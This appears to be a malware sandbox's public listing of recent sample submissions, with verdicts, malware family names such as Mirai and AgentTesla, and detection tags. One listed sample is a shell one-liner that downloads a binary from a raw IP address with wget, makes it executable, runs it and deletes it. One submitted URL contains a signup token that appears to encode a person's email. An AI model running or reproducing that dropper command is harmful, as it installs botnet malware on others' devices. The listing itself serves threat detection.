top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
  • Yara
Mirai
AV: 39%
no Icon
38XiTWXcpG.elf
2024-04-18 07:04:08 +02:00
Class
Malicious
  • Yara
Mirai
AV: 66%
no Icon
MY69DoYgp5.elf
2024-04-18 07:04:08 +02:00
Info
Class
Malicious
  • Yara
Mirai
AV: 34%
no Icon
hYN45tzxwl.elf
2024-04-18 07:04:08 +02:00
Info
Class
Malicious
  • Yara
  • Snort
Mirai
AV: 36%
no Icon
x86.elf
2024-04-18 07:01:06 +02:00
Info
Class
Malicious
no Icon
arm.elf
2024-04-18 07:01:06 +02:00
Info
Class
Malicious
no Icon
arm7.elf
2024-04-18 07:00:11 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 54%
yDOZ8nTvm8.rtf
2024-04-18 06:59:05 +02:00
Info
Class
Clean
SOC Clients RD Creds Proj.xlsx
2024-04-18 06:52:25 +02:00
Info
Malicious
  • Yara
  • Snort
Amadey
AV: 83%
c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe
2024-04-18 06:51:04 +02:00
Info
Class
Malicious
  • Yara
Mirai
AV: 46%
no Icon
cd /tmp; rm -rf shk; wget http://103.163.214.97/shk; chmod 777 shk; ./shk tplink; rm -rf shk
2024-04-18 06:50:34 +02:00
Info
Class
Malicious
  • Yara
  • Snort
Mars Stealer, Stealc, Vidar
AV: 49%
LXoASvZRu1.exe
2024-04-18 06:41:04 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
AgentTesla
AV: 52%
Leoch-Purchase Order.exe
2024-04-18 06:28:08 +02:00
Info
Class
Malicious
  • Sigma
Document for shipping.exe
2024-04-18 06:26:11 +02:00
Info
Class
Clean
https://id.atlassian.com/signup/welcome?token=eyJraWQiOiJtaWNyb3Mvc2lnbi1pbi1zZXJ2aWNlL2I5NzllNGxrbnRrNzdwbTIiLCJhbGciOiJSUzI1NiJ9.eyJhdWQiOiJsaW5rLXNpZ25hdHVyZS12YWxpZGF0b3IiLCJzdWIiOiJzaXZha3VtYXIuY2hpbnRodUBnbG9iYWxmb3VuZHJpZXMuY29tIiwibmJmIjoxNzEzNDEzMDQ3LCJzY29wZSI6IndlbGNvbWUiLCJpc3MiOiJtaWNyb3Mvc2lnbi1pbi1zZXJ2aWNlIiwicmVkaXJlY3RUeXBlIjoicmVzdW1lX3NpZ251cCIsImV4cCI6MTcxNDAxNzg0NywicmVjYXB0Y2hhU2NvcmUiOiJudWxsIiwiaWF0IjoxNzEzNDEzMDQ3LCJqdGkiOiI3N2Q5NzRlNi1hMmE2LTQxYzMtYTllMC0xODUyZDUwMDhiZTcifQ.BGbxhNFY09gz-QoQfz7L7_EhJdX4RKPuF-ySYJvs5MRcXTIoiGii9cPlNZt1gzxTocm6-n4TPvtb2H0qgboRq4fN0-ASoRbc8ueD2LIrFNXcDWDisFG4W2LtsPaEh8APRRHhOAk7__y-E29yp5Jp07jjBLMl1ubftiXYDDl0QybFCufRz-iIZt6Btb3e6ompot2dO7SNEXjXtp6UCXlbc1HAhYD_khbXWYL1X7O-3LCC0jIy03NllUTGCDZh1QuN4DAezuoUbVV3mgxBn_UjEV1zrj4XNnmRhAX8GX3xuHFfd7pRftyYOcKDlxqSo0dx8SdD2amuzLwav-oYV5ABuA&source=f27c2f50974749ac8ffe229ba04f9564
2024-04-18 06:24:15 +02:00
Info
Suspicious
SecuriteInfo.com.Trojan.Siggen21.62491.4036.26173.exe
2024-04-18 06:24:10 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 34%
SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
2024-04-18 06:24:10 +02:00
Info
Class
Malicious
  • Yara
  • Snort
Lokibot
AV: 35%
SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
2024-04-18 06:24:07 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Snort
AgentTesla
AV: 38%
SecuriteInfo.com.PWSX-gen.32561.14552.exe
2024-04-18 06:24:05 +02:00
Info
Class
Malicious
  • Yara
Havoc
AV: 0%
https://ortelia.com/download-ortelia-curator/
2024-04-18 06:20:29 +02:00
Info
Class
no
Graph
Clean
https://herd.laravel.com/download/windows
2024-04-18 06:07:03 +02:00
Info
no
Graph
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column